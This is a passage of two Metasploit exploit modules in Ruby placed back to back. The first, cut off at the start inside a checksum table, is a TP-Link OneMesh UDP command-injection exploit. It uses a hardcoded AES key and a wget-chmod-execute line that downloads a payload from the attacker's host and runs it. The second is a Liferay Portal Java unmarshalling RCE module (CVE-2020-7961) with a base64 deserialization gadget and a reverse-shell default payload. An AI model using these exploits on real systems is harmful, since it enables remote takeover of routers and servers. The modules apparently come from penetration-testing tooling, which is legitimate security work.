0xb1, 0x85, 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61, 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] res = 0xffffffff # main checksum calculation packet.each_entry { |c| index = ((c ^ res) & 0xff) * 4 # .reverse is needed as the target is big endian ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first) res = ref ^ (res >> 8) } checksum = ~res checksum_s = [(checksum)].pack('I>').force_encoding("ascii") # convert back to string packet = packet.pack('C*').force_encoding('ascii') # and replace the checksum packet[12] = checksum_s[0] packet[13] = checksum_s[1] packet[14] = checksum_s[2] packet[15] = checksum_s[3] packet end def aes_encrypt(plaintext) # Function encrypts perfectly 16 bytes aligned payload if (plaintext.length % 16 != 0) return end cipher = OpenSSL::Cipher.new 'AES-128-CBC' # in the original C code the key and IV are 256 bits long... but they still use AES-128 iv = "1234567890abcdef" key = "TPONEMESH_Kf!xn?" encrypted = '' cipher.encrypt cipher.iv = iv cipher.key = key # Take each 16 bytes block and encrypt it plaintext.scan(/.{1,16}/) { |block| encrypted += cipher.update(block) } encrypted end def create_injection(c) # Template for the command injection # The injection happens at "slave_mac" (read advisory for details) # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions. # This will fail if we send a command with single quotes (') # ... but that's not a problem for this module, since we don't use them for our command. # It might also fail with double quotes (") since this will break the JSON... inject = "\';printf \'#{c}\'>>#{@cmd_file}\'" template = "{\"method\":\"slave_key_offer\",\"data\":{"\ "\"group_id\":\"#{rand_text_numeric(1..3)}\","\ "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\ "\"slave_mac\":\"%{INJECTION}\","\ "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\ "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\ "\"want_to_join\":false,"\ "\"model\":\"#{rand_text_alpha(5..13)}\","\ "\"product_type\":\"#{rand_text_alpha(5..13)}\","\ "\"operation_mode\":\"A%{PADDING}\"}}" # This is required to calculate exact template length without replace flags template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length # This has to be initialized to cover the situation when no padding is needed pad = '' padding = rand_text_alpha(16) template_len += inject.length # Calculate pad if padding is needed if (template_len % 16 != 0) pad = padding[0..15-(template_len % 16)] end # Here the final payload is created template % {INJECTION:"#{inject}", PADDING:"#{pad}"} end def update_len_field(packet, payload_length) new_packet = packet[0..3] new_packet += [payload_length].pack("S>") new_packet += packet[6..-1] end def exec_cmd_file(packet) # This function handles special action of exec # Returns new complete tpdp packet inject = "\';sh #{@cmd_file}\'" payload = create_injection(inject) ciphertext = aes_encrypt(payload) if not ciphertext fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") end new_packet = packet[0..15] new_packet += ciphertext new_packet = update_len_field(new_packet, ciphertext.length) calc_checksum(new_packet.bytes) end # Handle incoming requests from the router def on_request_uri(cli, request) print_good("#{peer} - Sending executable to the router") print_good("#{peer} - Sit back and relax, Shelly will come visit soon!") send_response(cli, @payload_exe) @payload_sent = true end def exploit if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") end if datastore['SSL'] fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it") end print_status("Attempting to exploit #{target.name}") tpdp_packet_template = [0x01].pack('C*') + # packet version, fixed to 1 [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh) [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table [0x00].pack('S>*') + # packet len [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function [0x00].pack('C*') + # dunno what this is [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder srv_host = datastore['SRVHOST'] srv_port = datastore['SRVPORT'] @cmd_file = rand_text_alpha_lower(1) # generate our payload executable @payload_exe = generate_payload_exe # Command that will download @payload_exe and execute it download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" http_service = 'http://' + srv_host + ':' + srv_port.to_s print_status("Starting up our web service on #{http_service} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => "/#{@cmd_file}" }}) print_status("#{peer} - Connecting to the target") connect_udp print_status("#{peer} - Sending command file byte by byte") print_status("#{peer} - Command: #{download_cmd}") mod = download_cmd.length / 5 download_cmd.each_char.with_index { |c, index| # Generate payload payload = create_injection(c) if not payload fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!") end # Encrypt payload ciphertext = aes_encrypt(payload) if not ciphertext fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") end tpdp_packet = tpdp_packet_template.dup tpdp_packet += ciphertext tpdp_packet = update_len_field(tpdp_packet, ciphertext.length) tpdp_packet = calc_checksum(tpdp_packet.bytes) udp_sock.put(tpdp_packet) # Sleep to make sure the payload is processed by a target Rex.sleep(1) # Print progress if ((index+1) % mod == 0) percentage = 20 * ((index+1) / mod) # very advanced mathemathics in use here to show the progress bar print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]") if percentage == 100 # a bit of cheating to get the last char done right index = -2 end #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}") end } # Send the exec command. From here we should receive the connection print_status("#{peer} - Command file sent, attempting to execute...") tpdp_packet = exec_cmd_file(tpdp_packet_template.dup) udp_sock.put(tpdp_packet) timeout = 0 while not @payload_sent Rex.sleep(1) timeout += 1 if timeout == datastore['MAX_WAIT'].to_i fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(") end end disconnect_udp end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Java::HTTP::ClassLoader include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super(update_info(info, 'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE', 'Description' => %q{ This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1. }, 'Author' => [ 'Markus Wulftange', # Discovery 'Thomas Etrillard', # PoC 'wvu' # Module ], 'References' => [ ['CVE', '2020-7961'], ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'], ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'], ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271'] ], 'DisclosureDate' => '2019-11-25', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Privileged' => false, 'Targets' => [ ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'}, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check # GET / response contains a Liferay-Portal header with version information res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res return CheckCode::Unknown('Target did not respond to check request.') end unless res.headers['Liferay-Portal'] return CheckCode::Unknown( 'Target did not respond with Liferay-Portal header.' ) end =begin Building the Liferay-Portal header: https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java Liferay-Portal header data: https://github.com/liferay/liferay-portal/blob/master/release.properties Example GET / response: HTTP/1.1 200 [snip] Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019) [snip] =end version, build = res.headers['Liferay-Portal'].scan( /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/ ).flatten unless version && (build = Integer(build) rescue nil) return CheckCode::Detected( 'Target did not respond with Liferay version and build.' ) end # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched if build < 7201 return CheckCode::Appears( "Liferay #{version} MAY be a vulnerable version. Please verify." ) end CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super # Start our HTTP server to provide remote classloading @classloader_uri = start_service unless @classloader_uri fail_with(Failure::BadConfig, 'Could not start remote classloader server') end print_good("Started remote classloader server at #{@classloader_uri}") # Send our remote classloader gadget to the target, triggering the vuln send_request_gadget( normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'), # Required POST parameters for /api/jsonws/expandocolumn/update-column: # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java 'columnId' => rand(8..42), # Randomize for "evasion" 'name' => rand(8..42), # Randomize for "evasion" 'type' => rand(8..42) # Randomize for "evasion" ) end # Convenience method to send our gadget to a URI with desired POST params def send_request_gadget(uri, vars_post = {}) print_status("Sending remote classloader gadget to #{full_uri(uri)}") vars_post['+defaultData'] = 'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource' vars_post['defaultData.userOverridesAsString'] = "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};" send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => vars_post }, 0) end # Generate all marshalsec payloads for the Jackson marshaller: # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a def go_go_gadget # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget: # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java gadget = Rex::Text.decode_base64( <<~EOF rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0 aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0 ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7 kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ= EOF ) # Replace length-prefixed placeholder strings with our own gadget.sub!("\x00\x04HACK", packed_class_name) gadget.sub!("\x00\x03THE", packed_classloader_uri) gadget.sub("\x00\x06PLANET", packed_class_name) end # Convenience method to pack the classloader URI as a length-prefixed string def packed_classloader_uri "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}" end end